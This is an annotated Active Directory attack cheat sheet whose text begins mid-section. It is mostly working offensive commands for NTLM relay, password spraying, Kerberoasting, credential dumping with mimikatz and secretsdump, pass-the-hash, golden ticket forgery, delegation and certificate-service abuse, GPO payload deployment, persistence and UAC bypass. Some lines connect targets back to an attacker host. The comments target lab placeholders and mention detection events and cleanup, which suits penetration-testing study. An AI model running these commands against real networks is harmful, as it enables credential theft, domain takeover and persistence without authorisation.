# -P: force proxy authentication (NTLM) on the WPAD proxy
sudo responder -I eth0 -w -d -P

Crack NTLMv2 with Hashcat

bash
# -m 5600 = NetNTLMv2 (captured hashes are not pass-the-hash-able; they must be cracked or relayed)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
# Add a rule set to mutate the wordlist
hashcat -m 5600 hash.txt rockyou.txt --rules-file best64.rule

Mitm6 (IPv6 + DNS Spoofing)

bash
# Advertise ourselves as IPv6 DNS to the whole segment (affects every Windows host on the LAN -
# run for short windows only)
sudo mitm6 -d domain.local
# + ntlmrelayx in parallel: relay the resulting auth to LDAPS on the DC; -wh serves a WPAD file,
# -l dumps domain info to ./loot. Relay to LDAP(S) only works if LDAP signing/channel binding
# is not enforced.
impacket-ntlmrelayx -6 -t ldaps://DC01.domain.local -wh fakewpad.domain.local -l loot

Null Session / Anonymous Enumeration

SMB Null Session

bash
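# Anonymous SMB (null session) enumeration - same lab target as the rest of the sheet
# (the listing used 192.168.1.10 / 172.16.5.5 here, leftovers from another network)
enum4linux -a 10.10.10.10
# -P: password policy only - read this before any spraying
enum4linux -P 10.10.10.10
crackmapexec smb 10.10.10.10 -u '' -p '' --users
crackmapexec smb 10.10.10.10 -u '' -p '' --shares
# -N: no password, -L: list shares
smbclient -N -L //10.10.10.10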

LDAP Anonymous Bind

bash
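# -x: simple (anonymous) bind; succeeds only if the DC allows anonymous LDAP reads
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local"
# The objectClass is "user" (the listing had "administrator" from a bad find/replace)
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
nmap -p 389 --script ldap-search --script-args 'ldap.base="dc=domain,dc=local"' 10.10.10.10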

User Enumeration

Kerbrute (User Enumeration)

bash
# Kerberos pre-auth user enumeration: valid and invalid names get different KDC error codes,
# no password is sent so it does not count toward lockout, but it does log 4768 on the DC
kerbrute userenum -d domain.local --dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt -o valid_users.txt

NetExec / CrackMapExec

bash
# Null session first; authenticated variants also return the description field (often holds passwords)
netexec smb 10.10.10.10 -u '' -p '' --users
netexec smb 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --users
netexec smb 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --groups
# LDAP path works when SMB/RPC enumeration is restricted
netexec ldap 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --users

PowerView (Windows)

powershell
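Import-Module .\PowerView.ps1
Get-DomainUser | select -ExpandProperty cn
# description is worth reading - admins leave passwords in it
Get-DomainUser * | Select-Object samaccountname,description
# RSAT AD module equivalent
Get-ADUser -Filter * | select Name,SamAccountName
# Built-in: the command is "net user" (the listing had "net administrator" from a bad find/replace)
net user /domain
net user administrator /domain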

Password Spraying

Spray Techniques

bash
# Kerbrute - one password against many users (Kerberos pre-auth; failures log 4771)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Welcome1'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Password2024!'

# CrackMapExec / NetExec - --continue-on-success keeps going after the first hit
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Welcome1' --continue-on-success
# --no-bruteforce pairs users.txt[i] with passwords.txt[i] instead of the full cross product
netexec smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce
netexec ldap 10.10.10.10 -u users.txt -p 'Welcome1' --continue-on-success

# Check password policy BEFORE spraying (avoid lockout) - stay below the threshold and
# respect the observation window between rounds
crackmapexec smb 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --pass-pol
enum4linux -P 10.10.10.10

Full Enumeration with BloodHound

BloodHound-Python (From Linux)

bash
# -c All: every collection method (LDAP + SMB session/localgroup enumeration against all hosts -
# noisy; use -c DCOnly for an LDAP-only first pass). Resolve the DC hostname via DNS or /etc/hosts.
bloodhound-python -d domain.local -dc DC01.domain.local -c All -u administrator -p 'P@ssw0rd'
bloodhound-python -d domain.local -dc DC01.domain.local -c All -u administrator -p 'P@ssw0rd' --zip

# With hash (LM:NT, LM part left empty)
bloodhound-python -d domain.local -dc DC01.domain.local -c All -u administrator --hashes :NTLMHASH

SharpHound (From Windows)

powershell
# SharpHound binary - output zip goes to the current directory
.\SharpHound.exe -c all --zipfilename bloodhound_data
# PowerShell wrapper (SharpHound.ps1 loaded in memory)
Invoke-BloodHound -CollectionMethod all -ZipFileName bhdata.zip
# GPOLocalGroup resolves local group membership pushed by GPO (not covered by "All")
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup

Useful BloodHound Queries (Cypher)

cypher
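// All paths to DA. Cypher comments use //, not -- (the listing's -- lines are a syntax error).
// BloodHound stores principal names upper-cased, so the domain part must be DOMAIN.LOCAL.
MATCH p=shortestPath((n:User)-[*1..]->(m:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"})) RETURN p

// Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

// Computers with Unconstrained Delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c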

Advanced PowerView Enumeration

Domain and Trust Enumeration

powershell
# Domain
Get-DomainComputer
Get-ForestDomain
# Trusts tell you where a foothold can be extended (child/parent, external, forest)
Get-DomainTrust
Get-ForestTrust
Get-DomainGroup "Domain Admins"
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername

# Shares - -CheckShareAccess only lists shares the current user can actually read
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess

# OUs and GPOs
Get-DomainOU -FullData
Get-DomainGPO -Name "{GUID}"
# Local groups (e.g. local Administrators) populated through Restricted Groups / GPP
Get-DomainGPOLocalGroup -ResolveMembersToSIDs | select GPODisplayName,GroupName,GroupMembers

# ACLs (useful for DACL abuse) - look for non-admin principals holding write rights
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,objectdn | ft
# -SamAccountName is the PowerView v2 parameter; newer PowerView uses -Identity
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights

# LAPS (legacy ms-Mcs-AdmPwd attribute; readable only if delegated)
Get-DomainComputer -identity TARGET-PC -properties ms-Mcs-AdmPwd
Get-LAPSComputers
Find-LAPSDelegatedGroups

# Delegation - unconstrained hosts cache TGTs of anyone connecting to them
Get-DomainComputer -Unconstrained
# Constrained (TrustedToAuth): the msds-allowedtodelegateto SPNs are the services that can be reached
Get-DomainUser -TrustedToAuth | select userprincipalname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto

Kerberoasting

From Linux

bash
# Any domain account can request service tickets for SPN-bearing users; -request pulls the TGS
# (hashcat mode 13100 for RC4 tickets). Each request logs 4769 on the DC.
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request -outputfile kerberoast.hashes
# With hash
impacket-GetUserSPNs domain.local/administrator -hashes :NTLMHASH -dc-ip 10.10.10.10 -request

From Windows

powershell
# Rubeus - runs in the context of the current logon (no credentials needed)
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Only accounts with admincount=1 (current or former protected-group members); /nowrap for easy copy
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# PowerView
Get-DomainUser -SPN | select name,serviceprincipalname
# Request a ticket for a single SPN
Get-DomainSPNTicket -SPN "MSSQLSvc/sqlserver.domain.com"

Crack Kerberoast Hashes

bash
# -m 13100 = Kerberos 5 TGS-REP etype 23 (RC4). AES tickets (etype 17/18) need -m 19600/19700.
hashcat -a 0 -m 13100 kerberoast.hashes rockyou.txt
hashcat -a 0 -m 13100 kerberoast.hashes rockyou.txt --rules-file best64.rule

Targeted Kerberoasting (if GenericWrite)

powershell
# Give the target an SPN so a TGS encrypted with its password hash can be requested
Set-DomainObject -Identity TargetUser -Set @{serviceprincipalname='fake/spn'}
# Then kerberoast normally, then cleanup (the added SPN is an obvious artefact)
Set-DomainObject -Identity TargetUser -Clear serviceprincipalname

AS-REP Roasting

From Linux

bash
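# Unauthenticated: try each name in the list; the flag is -no-pass (the listing had -no-P@ssw0rd
# from a bad find/replace). Accounts with "Do not require Kerberos preauthentication" return an AS-REP
# encrypted with their password hash.
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-pass -usersfile valid_users.txt
# Authenticated: query LDAP for the flag and request all of them at once
impacket-GetNPUsers domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request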

From Windows

powershell
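# Rubeus - roast every account without pre-auth
.\Rubeus.exe asreproast /outfile:asrep.hashes
# Single target; Rubeus takes /user:, not /administrator: (bad find/replace in the listing)
.\Rubeus.exe asreproast /user:TargetUser /nowrap

# PowerView - find users without preauth
Get-DomainUser -PreauthNotRequired | select name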

Crack AS-REP Hashes

bash
# -m 18200 = Kerberos 5 AS-REP etype 23 (the $krb5asrep$23$ format Rubeus/impacket emit)
hashcat -a 0 -m 18200 asrep.hashes rockyou.txt

Targeted AS-REP (if GenericWrite)

powershell
# 4194304 = DONT_REQ_PREAUTH; XOR flips just that bit in userAccountControl without touching the rest
Set-DomainObject -Identity TargetUser -XOR @{useraccountcontrol=4194304}
# After exploitation, revert (XOR again clears the bit) - leaving it set weakens the account permanently
Set-DomainObject -Identity TargetUser -XOR @{useraccountcontrol=4194304}

Credential Dumping

Mimikatz

powershell
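# Dump LSASS credentials (needs SeDebugPrivilege; blocked by LSA protection (RunAsPPL) / Credential Guard)
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
lsadump::sam
lsadump::lsa /patch
# DCSync - mimikatz takes /user:, not /administrator: (bad find/replace in the listing)
lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:domain.local /all /csv

# Export Kerberos tickets (.kirbi files are written to the current directory)
sekurlsa::tickets /export
kerberos::list /export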

secretsdump (Impacket) from Linux

bash
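# Local admin on the target: SAM, LSA secrets, cached creds (and NTDS if it is a DC)
impacket-secretsdump domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-secretsdump domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
# -just-dc: only NTDS via DRSUAPI (DCSync) - needs replication rights, nothing is written on the DC
impacket-secretsdump -just-dc domain.local/administrator:P@ssw0rd@10.10.10.10
# -use-vss: copy NTDS.dit through a shadow copy instead of DRSUAPI (leaves files behind; louder).
# Domain is domain.local like the rest of the sheet (the listing had INLANEFREIGHT, an HTB leftover).
impacket-secretsdump -outputfile domain_hashes -just-dc domain.local/administrator:P@ssw0rd@DC01.domain.local -use-vss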

NetExec / CrackMapExec

bash
# Local account hashes (needs local admin on the target)
netexec smb 10.10.10.10 -u admin -p P@ssw0rd --sam
# LSA secrets: service account passwords, cached domain creds, machine account
netexec smb 10.10.10.10 -u admin -p P@ssw0rd --lsa
# Domain hashes; only meaningful against a DC with replication rights
netexec smb 10.10.10.10 -u admin -p P@ssw0rd --ntds

LSASS Dump via Task Manager

bash
# Task Manager > lsass.exe > Create dump file (as local admin; fails when LSASS runs as PPL).
# The .dmp is written under %TEMP% - move it off-host and delete it.
# Parse offline so no mimikatz ever touches the target
pypykatz lsa minidump lsass.dmp

Pass-the-Hash (PtH)

PtH Techniques

bash
# CrackMapExec - --local-auth targets the local SAM account; a shared local admin hash that
# works across the subnet means LAPS is absent
crackmapexec smb 10.10.10.0/24 -u Administrator -H :NTLMHASH --local-auth
netexec smb 10.10.10.10 -u Administrator -H NTLMHASH

# Impacket (-hashes LM:NT; empty LM part). psexec/smbexec create a service, wmiexec/atexec do not.
impacket-psexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-wmiexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-smbexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-atexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH "whoami"

# Evil-WinRM (user must be in Remote Management Users or local admins)
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH

Overpass-the-Hash / Pass-the-Ticket

Rubeus and Mimikatz

powershell
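# Rubeus - Overpass-the-Hash (get TGT from NTLM hash). Rubeus takes /user:, not /administrator:
# (bad find/replace in the listing). /rc4 produces an RC4 AS-REQ, which stands out where AES is the norm.
.\Rubeus.exe asktgt /user:Administrator /rc4:NTLMHASH /ptt
# /aes256 + /opsec: mimic a real Windows client (AES etype, pre-auth flow) - preferred when the key is known
.\Rubeus.exe asktgt /user:Administrator /aes256:AES256KEY /opsec /ptt

# Mimikatz - Overpass-the-Hash (spawns a new process whose logon session gets the forged TGT)
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:NTLMHASH /run:powershell.exe

# Import a .kirbi ticket (Pass-the-Ticket)
.\Rubeus.exe ptt /ticket:ticket.kirbi
kerberos::ptt ticket.kirbi

# Check active tickets
klist
.\Rubeus.exe triage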

DCSync

From Linux (Impacket)

bash
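# Full NTDS via DRSUAPI replication (needs DS-Replication-Get-Changes + -All, or DA)
impacket-secretsdump -just-dc domain.local/administrator:P@ssw0rd@DC01.domain.local
# Single account: the flag is -just-dc-user (the listing had -just-dc-administrator from a bad find/replace)
impacket-secretsdump -just-dc-user krbtgt domain.local/administrator:P@ssw0rd@DC01.domain.local
impacket-secretsdump -just-dc-user Administrator domain.local/administrator:P@ssw0rd@DC01.domain.local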

From Windows (Mimikatz)

powershell
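# mimikatz takes /user:, not /administrator: (bad find/replace in the listing)
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /all /csv

# Requires: DCSync rights (GenericAll, DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)
# Add DCSync rights via PowerView if you hold WriteDACL/GenericAll on the domain object.
# This ACE on the domain head is a classic persistence artefact - remove it when done.
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity administrator -Rights DCSync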

Golden and Silver Ticket

Forging Tickets

powershell
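# Golden Ticket (requires krbtgt hash + domain SID). mimikatz takes /user:, not /administrator:
# (bad find/replace in the listing). /endin:600 = 10 h lifetime, /renewmax:10080 = 7 d - keep these
# within the domain policy, out-of-policy lifetimes are a known golden-ticket detection.
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /krbtgt:KRBTGTHASH /id:500 /groups:513,512,520,518,519 /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Silver Ticket (requires machine account hash + SID) - forged TGS for one service, never touches the DC
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /rc4:MACHINEACCOUNTHASH /target:DC01.domain.local /service:HOST /id:500 /ptt

# Get domain SID (strip the trailing RID from a user SID)
Get-DomainSID
wmic useraccount get name,sid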

Golden Ticket from Linux

bash
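# Forge the TGT offline; writes Administrator.ccache in the current directory
impacket-ticketer -nthash KRBTGTHASH -domain-sid S-1-5-21-XXXX -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
# -k: use the ccache; the flag is -no-pass (the listing had -no-P@ssw0rd from a bad find/replace).
# Target by hostname - Kerberos needs the FQDN, an IP will fail.
impacket-psexec -k -no-pass domain.local/Administrator@DC01.domain.local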

Delegation (Unconstrained / Constrained / RBCD)

Unconstrained Delegation

powershell
# Identify
Get-DomainComputer -Unconstrained | select dnshostname

# Exploit (from compromised server with delegation) - watch LSASS for incoming TGTs
.\Rubeus.exe monitor /interval:5 /nowrap

# Force DC connection (PrinterBug / SpoolSample; needs the Print Spooler running on the DC)
.\MS-RPRN.exe \\DC01.domain.local \\unconstrained-srv.domain.local

# Pass the captured TGT (base64 blob printed by monitor) - it is the DC machine account's TGT, so DCSync follows
.\Rubeus.exe ptt /ticket:doIFxTCC...

Constrained Delegation

powershell
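Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Exploitation with Rubeus (S4U2Self + S4U2Proxy). Rubeus takes /user:, not /administrator:
# (bad find/replace in the listing). Needs the delegating account's key (/rc4 or /aes256).
.\Rubeus.exe s4u /user:svc_constrained /impersonateuser:Administrator /msdsspn:cifs/DC01.domain.local /ptt /rc4:NTLMHASH
# /altservice: the service name in the ticket is not signed, so a ticket for time/dc can be rewritten to ldap/dc
.\Rubeus.exe s4u /user:svc_constrained /impersonateuser:Administrator /msdsspn:time/dc /altservice:ldap /ptt /rc4:NTLMHASH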

Resource-Based Constrained Delegation (RBCD)

powershell
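# Requires GenericWrite/GenericAll on a computer object, plus ms-DS-MachineAccountQuota > 0
# (default 10) to add the fake machine account
# Create a fake machine account (PowerMad) - the parameter is -Password (bad find/replace in the listing)
New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force)

# Configure msDS-AllowedToActOnBehalfOfOtherIdentity: a security descriptor granting the fake machine full rights
$sid = Get-DomainComputer -Identity FakeMachine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)
Get-DomainComputer -Identity TargetSrv | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDbytes}

# Exploit with Rubeus (S4U2Self + S4U2Proxy) - Rubeus takes /user:, not /administrator:
.\Rubeus.exe s4u /user:FakeMachine$ /rc4:NTLMHASH_FAKEMACHINE /impersonateuser:Administrator /msdsspn:CIFS/TargetSrv.domain.local /ptt

# Cleanup: clear the attribute and remove the fake machine account
Get-DomainComputer -Identity TargetSrv | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'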

Lateral Movement

WMI

bash
# Linux - semi-interactive shell over DCOM/WMI (port 135 + dynamic RPC); output comes back via SMB
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-wmiexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH
powershell
# Windows - spawn a process remotely; no output is returned, so redirect it to a file and fetch it
Invoke-WmiMethod win32_process -ComputerName target.domain.local -name create -argumentlist "cmd.exe /c whoami > C:\out.txt"

PsExec / SMBExec

bash
# psexec uploads a service binary to ADMIN$ and installs a service - SYSTEM shell, but loud (7045 event)
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-psexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH
# smbexec also creates a service but runs each command through it without dropping a binary
impacket-smbexec domain.local/administrator:P@ssw0rd@10.10.10.10

WinRM / Evil-WinRM

bash
# WinRM (5985/5986) - user must be a local admin or in Remote Management Users
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd
evil-winrm -i 10.10.10.10 -u administrator -H NTLMHASH
# -s: directory of .ps1 scripts that can be loaded by name from the shell
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd -s /opt/scripts

PowerShell Remoting

powershell
# Create a session (plaintext password ends up in this process's memory and in PowerShell history)
$SecPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.local\administrator', $SecPassword)

# Remote execution: one-shot, interactive, or a reusable session
Invoke-Command -Credential $Cred -ComputerName DC01.domain.local -ScriptBlock {whoami}
Enter-PSSession -ComputerName DC01.domain.local -Credential $Cred
$sess = New-PSSession -Credential $Cred -ComputerName DC01.domain.local
# File transfer over the existing WinRM session (no SMB needed)
Copy-Item -Path .\tool.exe -ToSession $sess -Destination "C:\Users\Public\"

Scheduled Tasks

bash
# Remote scheduled task running as SYSTEM (needs admin on the target). /sc once /st 00:00 just
# parks it; /RUN triggers it immediately. Delete the task afterwards (schtasks /delete /tn shell /s ... /f) -
# creation logs 4698 and the task stays as an artefact.
schtasks /create /tn "shell" /ru "NT Authority\SYSTEM" /s DC01.domain.local /sc once /st 00:00 /tr "cmd.exe /c powershell -enc BASE64CMD"
schtasks /RUN /TN "shell" /s DC01.domain.local

Pivoting with Ligolo-ng

bash
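# On attacker: create the tun interface once, then start the proxy. The listing jumped straight
# to "ip route add ... dev ligolo", which fails when the interface does not exist yet
# (newer ligolo-ng releases can also create it from the proxy console with interface_create).
sudo ip tuntap add user "$USER" mode tun ligolo
sudo ip link set ligolo up
# -selfcert: ad-hoc TLS cert; the agent then needs -ignore-cert. Use a real cert when the
# link may be inspected, otherwise the tunnel is open to MITM.
./proxy -selfcert -laddr 0.0.0.0:11601

# On target
.\agent.exe -connect 10.10.14.1:11601 -ignore-cert

# In ligolo
session
start
# Add the route to the internal subnet through the tunnel (run from another shell on the attacker)
sudo ip route add 172.16.0.0/24 dev ligolo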

DACL Abuse

ACL Exploitation

powershell
# Identify interesting ACLs held by a user/group we control
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "compromised_user"}

# GenericAll / GenericWrite → Reset password (the user notices - their old password stops working)
$NewPass = ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force
Set-DomainUserPassword -Identity targetuser -AccountPassword $NewPass

# WriteDACL → Add DCSync rights (on the domain object itself)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity myuser -Rights DCSync

# ForceChangePassword (ExtendedRight) - same cmdlet, run as the principal holding the right
$cred = Get-Credential
Set-DomainUserPassword -Identity targetuser -AccountPassword $NewPass -Credential $cred

# GenericWrite on the group → Add to group (admin groups are protected by AdminSDHolder, ACE may be reset)
Add-DomainGroupMember -Identity "Domain Admins" -Members myuser

# WriteOwner → Take ownership of an object, then grant yourself everything
Set-DomainObjectOwner -Identity TargetUser -OwnerIdentity myuser
Add-DomainObjectAcl -TargetIdentity TargetUser -PrincipalIdentity myuser -Rights All

AD CS - Certificate Services Attacks

Enumerate with Certipy

bash
# Enumerate CAs and templates over LDAP/RPC (any domain user); -stdout prints instead of writing json/zip
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -stdout
# -vulnerable: only templates/CAs matching ESC1-ESC8 and similar checks
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -vulnerable -stdout

ESC1 - Template Misconfiguration (Enrollee Supplies Subject)

bash
# Run as the low-privileged enrollee; -upn sets the identity embedded in the certificate (the
# template allows the enrollee to supply the subject). The request is logged at the CA (4886/4887).
certipy req -u administrator@domain.local -p P@ssw0rd -ca CA_NAME -template VulnTemplate -upn administrator@domain.local -dc-ip 10.10.10.10
# PKINIT with the certificate: returns a TGT and the account's NT hash
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

ESC4 - WriteProperty on Template

bash
# Overwrite the template configuration with an ESC1-style one; -save-old keeps a json of the
# original so it can be restored (certipy template ... -configuration <saved>.json)
certipy template -u administrator@domain.local -p P@ssw0rd -template VulnTemplate -save-old
# Then request as in ESC1
certipy req -u administrator@domain.local -p P@ssw0rd -ca CA_NAME -template VulnTemplate -upn administrator@domain.local

Shadow Credentials (if GenericWrite on Computer/User)

bash
# Write a key credential to msDS-KeyCredentialLink, PKINIT as the target, recover its NT hash,
# then remove the key again (auto does all of that; needs PKINIT-capable DCs, i.e. AD CS present)
certipy shadow auto -u administrator@domain.local -p P@ssw0rd -account targetuser -dc-ip 10.10.10.10

PetitPotam + NTLM Relay to AD CS

bash
# Terminal 1 - relay the DC's machine-account auth to the web enrollment endpoint (ESC8).
# Only works when certsrv is reachable over HTTP without EPA/channel binding.
impacket-ntlmrelayx -t http://CA_SERVER/certsrv/certfnsh.asp --adcs --template DomainController

# Terminal 2 - coerce the DC to authenticate to us (unauthenticated EFSRPC on unpatched DCs)
python3 PetitPotam.py 10.10.14.1 DC01.domain.local
powershell
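# Retrieve a TGT as the DC machine account with the relayed certificate. Rubeus takes /user:,
# not /administrator: (bad find/replace in the listing); the account is DC01$ for DC01.domain.local.
.\Rubeus.exe asktgt /user:DC01$ /certificate:BASE64CERT /ptt
# A DC machine-account TGT has replication rights - DCSync from here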

GPO Abuse

Malicious GPO Creation

powershell
# Needs the GroupPolicy RSAT module and GPO create/link rights on the OU; applies to every
# computer in the OU at next refresh (~90 min) or gpupdate
New-GPO -Name 'Legit Update' | New-GPLink -Target 'OU=Workstations,DC=domain,DC=local'
# Registry preference item: Run key entry executes the payload on each logon
Set-GPPrefRegistryValue -Name 'Legit Update' -Context Computer -Action Create -Key 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' -ValueName 'Update' -Value 'cmd.exe /c powershell -enc BASE64' -Type ExpandString

# SharpGPOAbuse - immediate scheduled task running as SYSTEM on GPO apply (no RSAT needed)
SharpGPOAbuse.exe --AddComputerTask --TaskName "Windows Update" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net localgroup Administrators domain.local\administrator /add" --GPOName "Legit Update"

MSSQL Lateral Movement

MSSQL Enumeration and Exploitation

bash
# Enumerate MSSQL instances (1433) and test domain-auth logins across the subnet
netexec mssql 10.10.10.0/24 -u administrator -p P@ssw0rd
# -windows-auth: Kerberos/NTLM login instead of a SQL login
impacket-mssqlclient domain.local/administrator:P@ssw0rd@10.10.10.10 -windows-auth
sql
-- Enable xp_cmdshell (needs sysadmin; commands run as the SQL service account)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

-- Find linked servers (links often run with a fixed privileged login)
EXEC sp_linkedservers;

-- Execute on linked server (requires "RPC Out" enabled on the link; xp_cmdshell must be enabled there too)
EXEC ('xp_cmdshell ''whoami'' ') AT LINKEDSERVER;

-- Force NTLM auth (capture hash): the SQL service account authenticates to our SMB listener
-- (Responder / ntlmrelayx). Works for any user with EXECUTE on xp_dirtree, not just sysadmin.
EXEC master..xp_dirtree '\\10.10.14.1\share';

Domain Trust Abuse

Trust Enumeration and Exploitation

powershell
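# Enumerate trusts
Get-DomainTrust
Get-ForestTrust
# Principals from our domain that sit in groups of the target domain
Get-DomainForeignGroupMember -domain targetdomain.com

# Forge inter-domain ticket (child → parent)
# Get krbtgt hash from child domain via DCSync - mimikatz takes /user:, not /administrator:
# (bad find/replace in the listing)
lsadump::dcsync /domain:child.domain.com /user:krbtgt

# Golden Ticket with SID History to parent domain: /sids injects the parent Enterprise Admins
# SID (RID 519) as ExtraSid; not filtered on intra-forest parent/child trusts
kerberos::golden /user:Administrator /domain:child.domain.com /sid:S-1-5-21-CHILD-SID /krbtgt:CHILD_KRBTGT_HASH /sids:S-1-5-21-PARENT-SID-519 /ptt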

Persistence

Persistence Techniques

powershell
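# AdminSDHolder - persist in DA rights: SDProp copies this ACL onto every protected group/account
# (default every 60 min), so the ACE is re-applied even if someone removes it from Domain Admins
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity myuser -Rights All

# Skeleton Key (patch LSASS on the DC - all auth also accepts the password "mimikatz")
# In-memory only: lost on DC reboot; requires DA and SeDebugPrivilege on the DC; blocked by LSA protection
misc::skeleton

# DSRM account (local account on DC) - dump its hash from the DC
lsadump::lsa /patch
# Enable DSRM network auth (2 = the DSRM admin may log on over the network with that hash)
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Add a user to the DA group - the command is "net user" (the listing had "net administrator")
net user hacker P@ss123 /add /domain
net group "Domain Admins" hacker /add /domain

# Same via the AD module (plain group membership - this is not SID History injection, despite
# the heading in the original listing)
Add-ADGroupMember -Identity "Domain Admins" -Members newuser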

Local Privilege Escalation

PowerUp Checks

powershell
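# PowerUp - check all vectors
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Vulnerable services (modifiable binPath / config) - runs the command as the service account
Invoke-ServiceAbuse -Name "VulnerableSvc" -Command "net localgroup Administrators domain.local\administrator /add"

# Unquoted service path - the command is "net user" (the listing had "net administrator" from a bad find/replace)
Write-ServiceBinary -Name 'VulnSvc' -Command 'cmd /c net user hacker P@ss /add' -Path 'C:\Program Files\VulnSvc'
net stop VulnSvc; net start VulnSvc

# UAC Bypass (FODHelper) - needs a local admin at medium integrity with UAC below "Always notify";
# the HKCU handler keys are a common detection signature, delete them afterwards
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value ""
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start powershell.exe"
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden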

File Shares - Data Hunting

Share Enumeration and Spidering

bash
# Snaffler (find sensitive files) - Windows binary run from a domain-joined host; -s prints to
# stdout, -d picks the domain, -o writes the log
.\Snaffler.exe -s -d domain.local -o snaffler.log

# CrackMapExec / NetExec - list readable shares across the subnet, then crawl them
netexec smb 10.10.10.0/24 -u administrator -p P@ssw0rd --shares
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M spider_plus
# --pattern: check whether your netexec version expects several patterns space-separated
# rather than one comma-separated string - a single comma-joined argument may match nothing
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --spider C$ --pattern '*.config,*.xml,*.txt,*.bat,*password*'

# SMBClient (DOMAIN\user%password in one argument - the password lands in shell history and ps output)
smbclient //10.10.10.10/SHARE -U 'domain.local\administrator%P@ssw0rd'